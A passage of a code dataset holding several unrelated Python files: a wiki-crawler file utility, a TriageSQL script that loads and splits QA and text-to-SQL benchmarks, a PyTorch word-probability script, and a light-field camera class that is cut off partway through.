\n\n\"\"\")\n\n\nif __name__==\"__main__\":\n interface = os.environ.get(\"GATEWAY_INTERFACE\")\n if interface and interface.startswith(\"CGI/\"):\n main_cgi()\n else:\n main()\n","repo_name":"estraier/tkrzw-dict","sub_path":"search_wordnet.py","file_name":"search_wordnet.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"67"} +{"seq_id":"30418212270","text":"import os\nimport json\nfrom collections import OrderedDict\n\n\ndef sort_meta_dict(input_dict: dict) -> OrderedDict:\n \"\"\"\n Sorting Meta dictionary in result directory.\n @param input_dict:\n @return:\n \"\"\"\n sorted_tuple = sorted(input_dict.items(), key=lambda item: int(item[0]))\n return OrderedDict(sorted_tuple)\n\n\nclass FileUtil:\n max_storage = 0\n actual_storage = 0\n\n def __init__(self, max_storage=1000):\n self.max_storage = max_storage\n\n @staticmethod\n def mkdir_if_not_exists(dir):\n if not os.path.exists(dir):\n os.mkdir(dir)\n\n @staticmethod\n def save_to_txt_file(file_name: str, txt_iter: iter, output_dir=\"results\"):\n txt_dir = os.path.join(os.getcwd(), output_dir)\n FileUtil.mkdir_if_not_exists(txt_dir)\n file_path = os.path.join(txt_dir, file_name)\n file_object = open(file_path, 'a')\n for line in txt_iter:\n file_object.write(line)\n file_object.write(\"\\n\")\n file_object.close()\n\n @staticmethod\n def save_meta_dict(data, output_dir=\"results\"):\n meta_path = os.path.join(os.getcwd(), output_dir, 'meta.json')\n with open(meta_path, 'w') as fp:\n json.dump(sort_meta_dict(data), fp, ensure_ascii=False)\n\n @staticmethod\n def load_meta_dict(output_dir: str = \"results\") -> dict:\n \"\"\"\n @param output_dir: Output directory which contains meta\n @return: ordered dictionary by key\n \"\"\"\n meta_path = os.path.join(os.getcwd(), output_dir, 'meta.json')\n if os.path.exists(meta_path):\n with open(meta_path, 'r') as fp:\n return sort_meta_dict(json.load(fp))\n else:\n return OrderedDict()\n\n def add_storage(self, file_path):\n # Convert bytes to mega bytes\n file_size = os.path.getsize(file_path) / 1e+6\n print(\"file size:\", file_size)\n self.actual_storage += file_size\n\n def check_storage(self):\n print(\"actual storage\", self.actual_storage)\n return self.actual_storage < self.max_storage\n\n @staticmethod\n def delete_file(file_path: str):\n if os.path.exists(file_path):\n print(\"{} deleted.\".format(file_path))\n os.remove(file_path)\n","repo_name":"zawlinnnaing/my-wiki-crawler","sub_path":"utils/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14032523879","text":"from name import *\nfrom utils import *\nimport os\nimport time\n\ndef load_spider_data():\n spider_train_path = os.path.join(Spiderpath, Spidertrain)\n spider_others_path = os.path.join(Spiderpath, Spiderothers)\n spider_dev_path = os.path.join(Spiderpath, Spiderdev)\n spider_table_path = os.path.join(Spiderpath, Spidertable)\n\n spider_train_data = read_json(spider_train_path)\n spider_others_data = read_json(spider_others_path)\n spider_dev_data = read_json(spider_dev_path)\n spider_table_data = read_json(spider_table_path)\n\n total_data = []\n total_data += spider_train_data\n total_data += spider_dev_data\n\n questions, dbschema = preprocess_data(total_data, spider_table_data, Spider)\n otherquestions, dbschema = preprocess_data(spider_others_data, spider_table_data, Spiderother)\n\n return questions, dbschema, otherquestions\n\ndef load_hybridQA_data():\n hybridQA_train_path = os.path.join(HybridQApath, HybridQAtrain)\n hybridQA_test_path = os.path.join(HybridQApath, HybridQAtest)\n hybridQA_dev_path = os.path.join(HybridQApath, HybridQAdev)\n\n hybridQA_train_data = read_json(hybridQA_train_path)\n hybridQA_test_data = read_json(hybridQA_test_path)\n hybridQA_dev_data = read_json(hybridQA_dev_path)\n hybridQA_table_data = get_hybridQA_table_data()\n\n total_data = []\n total_data += hybridQA_train_data\n total_data += hybridQA_test_data\n total_data += hybridQA_dev_data\n\n questions, dbschema = preprocess_data(total_data, hybridQA_table_data, HybridQA)\n\n return questions, dbschema\n\ndef load_wikiSQL_data():\n wikiSQL_train_path = os.path.join(WikiSQLpath, WikiSQLtrain)\n wikiSQL_test_path = os.path.join(WikiSQLpath, WikiSQLtest)\n wikiSQL_dev_path = os.path.join(WikiSQLpath, WikiSQLdev)\n wikiSQL_train_table_path = os.path.join(WikiSQLpath, WikiSQLtraintable)\n wikiSQL_test_table_path = os.path.join(WikiSQLpath, WikiSQLtesttable)\n wikiSQL_dev_table_path = os.path.join(WikiSQLpath, WikiSQLdevtable)\n\n wikiSQL_train_data = read_jsonl(wikiSQL_train_path)\n wikiSQL_test_data = read_jsonl(wikiSQL_test_path)\n wikiSQL_dev_data = read_jsonl(wikiSQL_dev_path)\n wikiSQL_train_table_data = read_jsonl(wikiSQL_train_table_path)\n wikiSQL_test_table_data = read_jsonl(wikiSQL_test_table_path)\n wikiSQL_dev_table_data = read_jsonl(wikiSQL_dev_table_path)\n\n total_data = []\n total_data += wikiSQL_train_data\n total_data += wikiSQL_test_data\n total_data += wikiSQL_dev_data\n\n total_table = []\n total_table += wikiSQL_train_table_data\n total_table += wikiSQL_test_table_data\n total_table += wikiSQL_dev_table_data\n\n questions, dbschema = preprocess_data(total_data, total_table, WikiSQL)\n\n return questions, dbschema\n\ndef load_wikitable_data():\n wikitable_train_path = os.path.join(Wikitablepath, Wikitabletrain)\n\n wikitable_train_data = get_wikitable_question(wikitable_train_path)\n wikitable_table_data = get_wikitable_table_data()\n\n questions, dbschema = preprocess_data(wikitable_train_data, wikitable_table_data, Wikitable)\n\n return questions, dbschema\n\ndef load_kvret_data():\n kvret_train_path = os.path.join(Kvretpath, Kvrettrain)\n kvret_dev_path = os.path.join(Kvretpath, Kvretdev)\n\n kvret_train_data = read_json(kvret_train_path)\n kvret_dev_data = read_json(kvret_dev_path)\n\n total_data = []\n total_data += kvret_train_data\n total_data += kvret_dev_data\n\n questions, dbschema = preprocess_data(total_data, [], Kvret)\n\n return questions, dbschema\n\ndef load_tablefact_data():\n tablefact_train1_path = os.path.join(Tablefactquestionpath, Tablefacttrain1)\n tablefact_train2_path = os.path.join(Tablefactquestionpath, Tablefacttrain2)\n\n tablefact_train1_data = read_json(tablefact_train1_path)\n tablefact_train2_data = read_json(tablefact_train2_path)\n tablefact_table_data = get_tablefact_table_data()\n\n total_data = {}\n total_data.update(tablefact_train1_data)\n total_data.update(tablefact_train2_data)\n\n questions, dbschema = preprocess_data(total_data, tablefact_table_data, Tablefact)\n\n return questions, dbschema\n\ndef load_msmarco_data():\n #msmarcousefulnesspath = os.path.join(Msmarcopath, Msmarcousefulness)\n msmarcomsmarcopath = os.path.join(Msmarcopath, Msmarcomsmarco)\n #questions = get_msmarco_usefulness(msmarcousefulnesspath)\n questions = read_json(msmarcomsmarcopath)\n\n questions, dbschema = preprocess_data(questions, [], Msmarco)\n\n return questions, dbschema\n\ndef load_wikiQA_data():\n wikiqapath = os.path.join(WikiQApath, WikiQAtsv)\n\n questions = get_wikiQAtsv(wikiqapath)\n\n questions, dbschema = preprocess_data(questions, [], WikiQA)\n\n return questions, dbschema\n\ndef load_coqa_data():\n coqapath = os.path.join(Coqapath, Coqatrain)\n\n content = read_json(coqapath)\n\n questions, dbschema = preprocess_data(content, [], Coqa)\n\n return questions, dbschema\n\ndef load_quac_data():\n quacpath = os.path.join(Quacpath, Quactrain)\n\n content = read_json(quacpath)\n\n questions, dbschema = preprocess_data(content, [], Quac)\n\n return questions, dbschema\n\ndef load_dbdomain_data():\n dbdomainsqlitepath = os.path.join(Dbdomainpath, Dbdomainsqlite)\n dbdomainrevisedpath = os.path.join(Dbdomainpath, Dbdomainrevised)\n\n db2tables = get_domainsqlite(dbdomainsqlitepath, dbdomainrevisedpath)\n db2questionsambiguous, db2questionsnotambiguous = get_domainrevised(dbdomainrevisedpath)\n\n ambiguousquestions, dbschema = preprocess_data(db2questionsambiguous, db2tables, Dbdomainambiguous)\n notambiguousquestions, dbschema = preprocess_data(db2questionsnotambiguous, db2tables, Dbdomainnotambiguous)\n\n return ambiguousquestions, notambiguousquestions, dbschema\n\ndef load_alex_data():\n alexpath = os.path.join(Alexpath, Alexdataset)\n\n alexquestions = read_json(alexpath)\n\n questions, dbschema = preprocess_data(alexquestions, [], Alex)\n\n return questions, dbschema\n\ndef load_googlenq_data():\n \"\"\"googlenqpath = os.path.join(Googlenqpath, Googlenqdev)\n\n googlenqquestions = read_jsonl(googlenqpath)\"\"\"\n googlenqpath = os.path.join(Googlenqpath, Googlenqdata)\n\n googlenqquestions = read_json(googlenqpath)\n\n questions, dbschema = preprocess_data(googlenqquestions, [], Googlenq)\n\n return questions, dbschema\n\ndef load_totto_data():\n tottotrainpath = os.path.join(Tottopath, Tottotrain)\n tottodevpath = os.path.join(Tottopath, Tottodev)\n\n #tottotrainquestions = read_jsonl(tottotrainpath)\n tottodevquestions = read_jsonl(tottodevpath)\n\n total_data = []\n #total_data += tottotrainquestions\n total_data += tottodevquestions\n\n questions, dbschema = preprocess_data(total_data, [], Totto)\n\n return questions, dbschema\n\ndef load_logicnlg_data():\n logicnlgtrainpath = os.path.join(Logicnlgpath, Logicnlgtrain)\n #logicnlgtestpath = os.path.join(Logicnlgpath, Logicnlgtest)\n #logicnlgvalpath = os.path.join(Logicnlgpath, Logicnlgval)\n\n logicnlgtrainquestions = read_json(logicnlgtrainpath)\n\n questions, dbschema = preprocess_data(logicnlgtrainquestions, [], Logicnlg)\n\n return questions, dbschema\n\ndef load_sparc_data():\n sparctrainpath = os.path.join(Sparcpath, Sparctrain)\n sparcdevpath = os.path.join(Sparcpath, Sparcdev)\n sparctablespath = os.path.join(Sparcpath, Sparctables)\n\n sparctraindata = read_json(sparctrainpath)\n sparcdevdata = read_json(sparcdevpath)\n sparctables = read_json(sparctablespath)\n\n total_data = []\n total_data += sparctraindata\n total_data += sparcdevdata\n\n questions, dbschema = preprocess_data(total_data, sparctables, Sparc)\n\n return questions, dbschema\n\ndef load_cosql_data():\n cosqldatapath = os.path.join(Cosqlpath, Cosqldialogs)\n cosqltrainpath = os.path.join(Cosqluserintentpath, Cosqltrain)\n cosqldevpath = os.path.join(Cosqluserintentpath, Cosqldev)\n cosqltablepath = os.path.join(Cosqlpath, Cosqltables)\n\n cosqldata = read_json(cosqldatapath)\n cosqltraindata = read_json(cosqltrainpath)\n cosqldevdata = read_json(cosqldevpath)\n cosqltables = read_json(cosqltablepath)\n\n total_data = []\n total_data += cosqltraindata\n total_data += cosqldevdata\n\n questions, dbschema = preprocess_data(total_data, cosqltables, Cosql)\n questionsnotambiguous, dbschema = preprocess_data(cosqldata, cosqltables, Cosqlnotambiguous)\n\n return questions, dbschema, questionsnotambiguous\n\ndef load_alexa_data():\n alexatrainpath = os.path.join(Alexapath, Alexatrain)\n alexavalidfreqpath = os.path.join(Alexapath, Alexavalidfreq)\n alexavalidrarepath = os.path.join(Alexapath, Alexavalidrare)\n alexatestfreqpath = os.path.join(Alexapath, Alexatestfreq)\n alexatestrarepath = os.path.join(Alexapath, Alexatestrare)\n\n alexatraindata = read_json(alexatrainpath)\n alexavalidfreq = read_json(alexavalidfreqpath)\n alexavalidrare = read_json(alexavalidrarepath)\n alexatestfreq = read_json(alexatestfreqpath)\n alexatestrare = read_json(alexatestrarepath)\n\n total_data = {}\n total_data.update(alexatraindata)\n total_data.update(alexavalidfreq)\n total_data.update(alexavalidrare)\n total_data.update(alexatestfreq)\n total_data.update(alexatestrare)\n\n questions, dbschema = preprocess_data(total_data, [], Alexa)\n\n return questions, dbschema\n\nif __name__ == \"__main__\":\n start = time.time()\n\n spiderquestions, spiderdbschema, spiderotherquestions = load_spider_data()\n hybridQAquestions, hybridQAschema = load_hybridQA_data()\n wikiSQLquestions, wikiSQLschema = load_wikiSQL_data()\n wikitablequestions, wikitableschema = load_wikitable_data()\n #kvretquestions, kvretschema, kvretquestions2dataset = load_kvret_data()\n tablefactquestions, tablefactschema = load_tablefact_data()\n msmarcoquestions, msmarcoschema = load_msmarco_data()\n wikiqaquestions, wikiqaschema = load_wikiQA_data()\n coqaquestions, coqaschema = load_coqa_data()\n quacquestions, quacschema = load_quac_data()\n dbdomainambiguousquestions, dbdomainnotambiguousquestions, dbdomainschema = load_dbdomain_data()\n #alexquestions, alexschema = load_alex_data()\n googlenqquestions, googlenqschema = load_googlenq_data()\n tottoquestions, tottoschema = load_totto_data()\n logicnlgquestions, logicnlgschema = load_logicnlg_data()\n sparcquestions, sparcschema = load_sparc_data()\n cosqlquestions, cosqlschema, cosqlnotambiguousquestions = load_cosql_data()\n alexaquestions, alexaschema = load_alexa_data()\n\n total_schema = {Spider: spiderdbschema,\n Spiderother: spiderdbschema,\n HybridQA: hybridQAschema,\n WikiSQL: wikiSQLschema,\n Wikitable: wikitableschema,\n Tablefact: tablefactschema,\n Dbdomainambiguous: dbdomainschema,\n Dbdomainnotambiguous: dbdomainschema,\n Totto: tottoschema,\n Logicnlg: wikiSQLschema,\n Sparc: sparcschema,\n Cosql: cosqlschema,\n Cosqlnotambiguous: cosqlschema}\n\n train_schema, dev_schema, test_schema = splitdataschema(total_schema)\n\n \"\"\"out = WikiSQL\n\n newschema = {}\n for key in train_schema[out]:\n newschema[key] = train_schema[out][key]['table']\n mkdir(out)\n write_json(\n newschema, out + \"/train.json\"\n )\n newschema = {}\n for key in test_schema[out]:\n newschema[key] = test_schema[out][key]['table']\n mkdir(out)\n write_json(\n newschema, out + \"/test.json\"\n )\n\n newschema = {}\n for key in dev_schema[out]:\n newschema[key] = dev_schema[out][key]['table']\n mkdir(out)\n write_json(\n newschema, out + \"/dev.json\"\n )\"\"\"\n\n total_questions = {Spider: spiderquestions,\n Spiderother: spiderotherquestions,\n WikiSQL: wikiSQLquestions,\n Tablefact: tablefactquestions,\n Msmarco: msmarcoquestions,\n WikiQA: wikiqaquestions,\n Coqa: coqaquestions,\n Quac: quacquestions,\n Dbdomainambiguous: dbdomainambiguousquestions,\n Dbdomainnotambiguous: dbdomainnotambiguousquestions,\n #Alex: alexquestions,\n Googlenq: googlenqquestions,\n Totto: tottoquestions,\n Wikitable: wikitablequestions,\n HybridQA: hybridQAquestions,\n Logicnlg: logicnlgquestions,\n Sparc: sparcquestions,\n Cosql: cosqlquestions,\n Alexa: alexaquestions,\n Cosqlnotambiguous: cosqlnotambiguousquestions\n }\n\n\n question_count = defaultdict(int)\n for datasetid in total_questions:\n dataset = total_questions[datasetid]\n for dbid in dataset:\n db = dataset[dbid]\n question_count[datasetid] += len(db)\n\n\n print(\"question_num:\")\n for datasetid in question_count:\n print(datasetid + \": \" + str(question_count[datasetid]))\n print(\"------------------\")\n\n #total_questions = filterquestion(totalq)\n\n trainq, devq, testq = splittype1question(total_questions)\n\n train_dataset = defaultdict(lambda : defaultdict(int))\n dev_dataset = defaultdict(lambda : defaultdict(int))\n test_dataset = defaultdict(lambda : defaultdict(int))\n\n train_question = defaultdict(lambda: defaultdict(int))\n dev_question = defaultdict(lambda: defaultdict(int))\n test_question = defaultdict(lambda: defaultdict(int))\n\n print(\"trainset:\")\n train_type1 = gen_type1(trainq, train_schema, train_dataset, train_question)\n print(\"type1 dataset: \" + str(dict(train_dataset[Type1])))\n print(\"type1 question: \" + str(dict(train_question[Type1])))\n train_type2 = gen_type2(total_questions, train_schema, train_dataset, train_question)\n print(\"type2 dataset: \" + str(dict(train_dataset[Type2])))\n print(\"type2 question: \" + str(dict(train_question[Type2])))\n train_type3 = gen_type3(total_questions, train_schema, train_dataset, train_question)\n print(\"type3 dataset: \" + str(dict(train_dataset[Type3])))\n print(\"type3 question: \" + str(dict(train_question[Type3])))\n train_type4 = gen_type4(total_questions, train_schema, train_dataset, train_question)\n print(\"type4 dataset: \" + str(dict(train_dataset[Type4])))\n print(\"type4 question: \" + str(dict(train_question[Type4])))\n train_type5 = gen_type5(total_questions, train_schema, train_dataset, train_question)\n print(\"type5 dataset: \" + str(dict(train_dataset[Type5])))\n print(\"type5 question: \" + str(dict(train_question[Type5])))\n mkdir(Train)\n write_json(train_type1, os.path.join(Train, Type1json))\n write_json(train_type2, os.path.join(Train, Type2json))\n write_json(train_type3, os.path.join(Train, Type3json))\n write_json(train_type4, os.path.join(Train, Type4json))\n write_json(train_type5, os.path.join(Train, Type5json))\n print(\"------------------\")\n\n print(\"devset:\")\n dev_type1 = gen_type1(devq, dev_schema, dev_dataset, dev_question)\n print(\"type1 dataset: \" + str(dict(dev_dataset[Type1])))\n print(\"type1 question: \" + str(dict(dev_question[Type1])))\n dev_type2 = gen_type2(total_questions, dev_schema, dev_dataset, dev_question)\n print(\"type2 dataset: \" + str(dict(dev_dataset[Type2])))\n print(\"type2 question: \" + str(dict(dev_question[Type2])))\n dev_type3 = gen_type3(total_questions, dev_schema, dev_dataset, dev_question)\n print(\"type3 dataset: \" + str(dict(dev_dataset[Type3])))\n print(\"type3 question: \" + str(dict(dev_question[Type3])))\n dev_type4 = gen_type4(total_questions, dev_schema, dev_dataset, dev_question)\n print(\"type4 dataset: \" + str(dict(dev_dataset[Type4])))\n print(\"type4 question: \" + str(dict(dev_question[Type4])))\n dev_type5 = gen_type5(total_questions, dev_schema, dev_dataset, dev_question)\n print(\"type5 dataset: \" + str(dict(dev_dataset[Type5])))\n print(\"type5 question: \" + str(dict(dev_question[Type5])))\n mkdir(Dev)\n write_json(dev_type1, os.path.join(Dev, Type1json))\n write_json(dev_type2, os.path.join(Dev, Type2json))\n write_json(dev_type3, os.path.join(Dev, Type3json))\n write_json(dev_type4, os.path.join(Dev, Type4json))\n write_json(dev_type5, os.path.join(Dev, Type5json))\n print(\"------------------\")\n\n print(\"testset:\")\n test_type1 = gen_type1(testq, test_schema, test_dataset, test_question)\n print(\"type1 dataset: \" + str(dict(test_dataset[Type1])))\n print(\"type1 question: \" + str(dict(test_question[Type1])))\n test_type2 = gen_type2(total_questions, test_schema, test_dataset, test_question)\n print(\"type2 dataset: \" + str(dict(test_dataset[Type2])))\n print(\"type2 question: \" + str(dict(test_question[Type2])))\n test_type3 = gen_type3(total_questions, test_schema, test_dataset, test_question)\n print(\"type3 dataset: \" + str(dict(test_dataset[Type3])))\n print(\"type3 question: \" + str(dict(test_question[Type3])))\n test_type4 = gen_type4(total_questions, test_schema, test_dataset, test_question)\n print(\"type4 dataset: \" + str(dict(test_dataset[Type4])))\n print(\"type4 question: \" + str(dict(test_question[Type4])))\n test_type5 = gen_type5(total_questions, test_schema, test_dataset, test_question)\n print(\"type5 dataset: \" + str(dict(test_dataset[Type5])))\n print(\"type5 question: \" + str(dict(test_question[Type5])))\n mkdir(Test)\n write_json(test_type1, os.path.join(Test, Type1json))\n write_json(test_type2, os.path.join(Test, Type2json))\n write_json(test_type3, os.path.join(Test, Type3json))\n write_json(test_type4, os.path.join(Test, Type4json))\n write_json(test_type5, os.path.join(Test, Type5json))\n print(\"------------------\")\n\n #get_stat(train_question, test_question, dev_question)\n\n end = time.time()\n print(end - start)\n\n","repo_name":"chatc/TriageSQL","sub_path":"gen_data/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18010,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"67"} +{"seq_id":"1122608563","text":"\n# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport data\nimport argparse\nimport torch\nimport os\n\nparser = argparse.ArgumentParser(description='PyTorch Wikitext-2 RNN/LSTM Language Model')\nparser.add_argument('--input',type=str, default='./data',\n help='path leading to the directory that contains input text files')\nparser.add_argument('--data', type=str, default='./data',\n help='location of the data corpus')\nparser.add_argument('--outf', type=str, default='output.tsv',\n help='tsv output file to store probabilities')\nparser.add_argument('--checkpoint', type=str, default='./model.pt',\n help='saved model to be loaded,checkpoint saved during training')\nparser.add_argument('--cuda', action='store_true',\n help='use CUDA')\n#parser.add_argument('--bptt', type=int, default=1,\n# help='sequence length')\nargs = parser.parse_args()\nif torch.cuda.is_available():\n if not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\ndevice = torch.device(\"cuda\" if args.cuda else \"cpu\")\n\n# create vocab\ncorpus = data.Corpus(args.data)\nntokens = len(corpus.dictionary)\n\n# initialize required parameters here\neval_batch_size = 1\nsoftmax = torch.nn.Softmax(dim = -1)\n\nwith open(args.checkpoint, 'rb') as f:\n model = torch.load(f,map_location='cpu').to(device)\n\nis_transformer_model = hasattr(model, 'model_type') and model.model_type == 'Transformer'\n\ndef get_index(word):\n if word in corpus.dictionary.word2idx:\n #print(corpus.dictionary.word2idx[word])\n return corpus.dictionary.word2idx[word]\n else:\n return corpus.dictionary.word2idx[\"\"]\n\ndef batchify(data, bsz):\n # Work out how cleanly we can divide the dataset into bsz parts.\n nbatch = data.size(0) // bsz\n # Trim off any extra elements that wouldn't cleanly fit (remainders).\n data = data.narrow(0, 0, nbatch * bsz)\n # Evenly divide the data across the bsz batches.\n data = data.view(bsz, -1).t().contiguous()\n #print(data.shape)\n return data.to(device)\n\n'''def get_batch(source, i):\n seq_len = min(args.bptt, len(source) - 1 - i)\n data = source[i:i+seq_len]\n target = source[i+1:i+1+seq_len].view(-1)\n return data, target\n'''\ndef repackage_hidden(h):\n \"\"\"Wraps hidden states in new Tensors, to detach them from their history.\"\"\"\n\n if isinstance(h, torch.Tensor):\n return h.detach()\n else:\n return tuple(repackage_hidden(v) for v in h)\n\ndef text_to_word_ids(path):\n\twith open(path, 'r', encoding=\"utf8\") as f:\n idss = []\n for line in f:\n words = line.split()\n ids = []\n for word in words:\n ids.append(get_index(word))\n idss.append(torch.tensor(ids).type(torch.int64))\n ids = torch.cat(idss) \n\treturn ids\n\ndef prepare_data(path):\n ids_list = text_to_word_ids(path)\n test_data = batchify(ids_list, eval_batch_size)\n return test_data\n\ndef get_probability(input_filepath,output_filepath):\n\n input_data = prepare_data(input_filepath)\n\n # Turn on evaluation mode which disables dropout.\n model.eval()\n\n if not is_transformer_model:\n hidden = model.init_hidden(eval_batch_size)\n\n with torch.no_grad(),open(output_filepath, 'w') as outfile,open(input_filepath, 'r', encoding=\"utf8\") as inputfile:\n\n i =0\n line_id=-1\n outfile.write(\"\\nLINE_NUMBER\\t\\t\\tWORD_INDEX\\t\\t\\tPROBABILITY\\n\")\n\n for line in inputfile:\n\n line_id += 1\n words = line.split() #+ ['']\n\n seq_len = len(words)\n\n if seq_len>0:\n data = input_data[i:i+seq_len]\n\n if is_transformer_model:\n output = model(data)\n else: #output is linear o/p of shape seq_len,batch,ntoken\n output, hidden = model(data, hidden) #encode o/p seq_len, batch, num_directions * hidden_size,linear o/p se\n hidden = repackage_hidden(hidden)\n #print(output.shape)\n #print(output)\n probabilities = softmax(output)\n\n for j,wrd_idx in enumerate(data): #target\n\n wrd_prob = probabilities[j,0,wrd_idx].item()\n #print(wrd_prob)\n #print(\"word=\",wrd_idx,\"output_idx:\",output[j,0,wrd_idx])\n\n outfile.write(\"\\n\\t\") #Line {}\\t\\tword_pos:{}\\t\\tprobability:{0:.2f}\".format(line_id, wrd_idx,wrd_prob))\n outfile.write(str(line_id))\n outfile.write(\"\\t\\t\\t\")\n outfile.write(str(j))\n outfile.write(\"\\t\\t\\t\\t\")\n outfile.write(str(round(wrd_prob,5)))\n i=i+seq_len\n\n\n##### check input file path and create output filepath for saving probabilities ######\n\n#### for wikitext folder containing train,valid and test data, to use only test data\n\nif args.input == './data':\n\n input_path = os.path.join(args.input, 'test.txt')\n\n output_directory=os.path.splitext(os.path.basename(args.checkpoint))[0]+\"_output\"\n\n if not os.path.exists(output_directory):\n os.makedirs(output_directory)\n\n output_path = os.path.join(output_directory,os.path.splitext(os.path.basename(args.input))[0]+\".tsv\")\n get_probability(input_path,output_path)\n\nelse:\n ###### for other input directories with multiple text files\n\n # get input directory\n dir_name = args.input\n input_directory = os.fsencode(args.input)\n\n # create appropriate output folder for a particular model using saved model name\n out_dir = os.path.splitext(os.path.basename(args.checkpoint))[0]+\"_output\"\n sub_dir = os.path.splitext(os.path.basename(args.input))[0]+\"_output\"\n\n output_directory = os.path.join(out_dir,sub_dir)\n\n if not os.path.exists(output_directory):\n os.makedirs(output_directory)\n\n #print(output_directory)\n for file in os.listdir(input_directory):\n filename = os.fsdecode(file)\n #print(os.path.join(directory_in_str, filename))\n if filename.endswith(\".txt\"):\n input_path = os.path.join(args.input, filename)\n output_path =os.path.join(output_directory,os.path.splitext(os.path.basename(filename))[0]+\".tsv\")\n get_probability(input_path,output_path)\n","repo_name":"sne265/work","sub_path":"Neural Language model/probability.py","file_name":"probability.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8495185853","text":"import gc\nimport joblib\nimport numpy as np\nfrom matplotlib import tri as mtri\nfrom scipy import interpolate\nfrom skimage import img_as_float\n\nimport plenpy.logg\nfrom plenpy import lightfields as lf\nfrom plenpy.utilities import demosaic\nfrom plenpy.utilities import images\n\nlogger = plenpy.logg.get_logger()\n\n__all__ = ['GenericLightFieldCamera']\n\n\n# TODO: Needs a redo. A lot has changed, yet this implementation has not...\n# Relies on old methods of AbstractLightFieldCamera...\nraise NotImplementedError\n\n\nclass GenericLightFieldCamera(AbstractLightFieldCamera):\n \"\"\"Generic light field camera.\n\n This camera class can be used to calibrate and decode generic light\n field cameras. That is, microlens based cameras with either hexagonal\n or rectangular microlens array. The calibration is solely done via\n whiteimages, which have to be stored in the ``Calibration`` folder.\n The camera calculates decoded images as a\n :class:`.plenpy.lightfields.lightfield.LightField` object.\n\n The class does not add any attributes to the\n :class:`AbstractLightFieldCamera` base class.\n\n \"\"\"\n\n def __init__(self, path: Any, microlens_size: float):\n \"\"\":class:`GenericLightFieldCamera` class initialization.\n\n See Also:\n The camera uses the :class:`AbstractLightFieldCamera` base class\n initialization.\n\n \"\"\"\n super().__init__(path=path,\n microlens_size=microlens_size)\n\n return\n\n def calibrate(self,\n demosaic_method: Optional[str] = None,\n pattern: Optional[str] = None,\n force: bool = False):\n \"\"\"Calibration of the LightFieldCamera.\n\n The basic calibration pipeline is:\\n\n * Calculate an ideal white image\n * Calculate the microlens centers\n\n Args:\n demosaic_method : Method used to calculate the demosaiced image.\n If ``None`` is specified, no demosaicing is performed. For\n available methods\n see :func:`plenpy.utilities.demosaic.get_demosaiced()`.\n\n pattern: Bayer filter pattern that the input image is modulated\n with. Only used if image is being demosaiced.\n\n force: If set to ``True``, force the recalibration,\n even if a calibration file is found.\n Overwrites the calibration file.\n\n \"\"\"\n logger.info(\"Calibrating camera...\")\n # If a calibration file is found, load it\n if (self.path / self._calDataFilename).is_file() and not force:\n logger.info(\n \"Found calibration data in '{}'. \"\n \"Reading from calibration file.\".format(\n self.calibrationFolderPath))\n self._load_cal_data()\n\n else:\n self._calc_ideal_whiteimage(demosaic_method=demosaic_method,\n pattern=pattern)\n self._calc_microlens_centers()\n self._isCalibrated = True\n\n # If no calibration file is there, save it\n if not (self.path / self._calDataFilename).is_file() or force:\n logger.info(\"Saving compressed calibration data...\")\n self._save_cal_data()\n\n self._isCalibrated = True\n logger.info(\"... done.\")\n gc.collect()\n return\n\n def decode_sensor_image(self,\n num: int,\n demosaic_method: Optional[str] = None,\n pattern: Optional[str] = None,\n multithreading: int = 0):\n \"\"\"Decode the specified sensor image.\n\n The decoding gives a\n :class:`.plenpy.lightfields.lightfield.LightField` object that is\n added the objects dictionary of decoded images.\n\n Args:\n num: Number of the sensor image that is to be decoded.\n\n demosaic_method : Method used to calculate the demosaiced image.\n If ``None`` is specified, no demosaicing is performed. For\n available methods and default value,\n see :func:`plenpy.utilities.demosaic.get_demosaiced()`.\n\n pattern: Bayer filter pattern that the input image is modulated\n with. Only used if image is being demosaiced.\n\n multithreading: Specify number of parallel threads.\n If ``0`` is specified, no multithreading is applied. Caution:\n The multithreading implementation is very heavy on RAM.\n Default: 0\n\n \"\"\"\n logger.info(\"Decoding sensor image number {}...\".format(num))\n\n # Check multithreading option:\n if not isinstance(multithreading, int) or multithreading < 0:\n raise ValueError(\n f\"Multithreading option {multithreading} is not an integer. \"\n \"Please specify a positive integer value.\")\n\n # Get sensor image in shape (x, y, N)\n raw_img = self.get_sensor_image(num)\n\n if demosaic_method is not None:\n # Demosaic sensor image\n logger.info(\n f\"Demosaicing sensor image using {pattern} pattern...\")\n img = demosaic.get_demosaiced(np.squeeze(raw_img),\n pattern=pattern,\n method=demosaic_method)\n\n logger.info(\"...done.\")\n\n else:\n img = raw_img\n\n # Convert to float\n img = img_as_float(img, raw_img.dtype)\n del raw_img\n\n # Calculate interpolation object\n interp = self._calc_interp_image(img)\n\n # Initialize light field data\n lf_s = int(img.shape[0] / self._microlensSize)\n lf_t = int(img.shape[1] / self._microlensSize)\n lf_u = self._microlensSize\n lf_v = self._microlensSize\n num_channels = interp.size\n\n # Garbage collection to free up memory\n gc.collect()\n del img\n\n lf_data = np.zeros((lf_u, lf_v, lf_s, lf_t, num_channels)).astype(\n np.float64)\n\n if multithreading == 0:\n # Calculate light field serially, no multithreading.\n for u in range(-self._microlensRadius, self._microlensRadius + 1):\n for v in range(-self._microlensRadius,\n self._microlensRadius + 1):\n logger.info(\n \"Calculating subaperture \"\n \"#({},{}) of ({},{})...\".format(\n u + self._microlensRadius,\n v + self._microlensRadius,\n self._microlensSize,\n self._microlensSize))\n\n img = self._calc_subaperture(\n interp=interp, x=u, y=v, method=\"linear\")\n\n lf_data[u + self._microlensRadius,\n v + self._microlensRadius,\n :, :, :] = img\n\n # Garbage collection to free up memory\n gc.collect()\n\n logger.info(\"...done #({},{}).\".format(\n u + self._microlensRadius,\n v + self._microlensRadius\n ))\n\n del img\n\n else:\n # Calculate subaperture clusters in parallel\n img_clusters = joblib.Parallel(\n 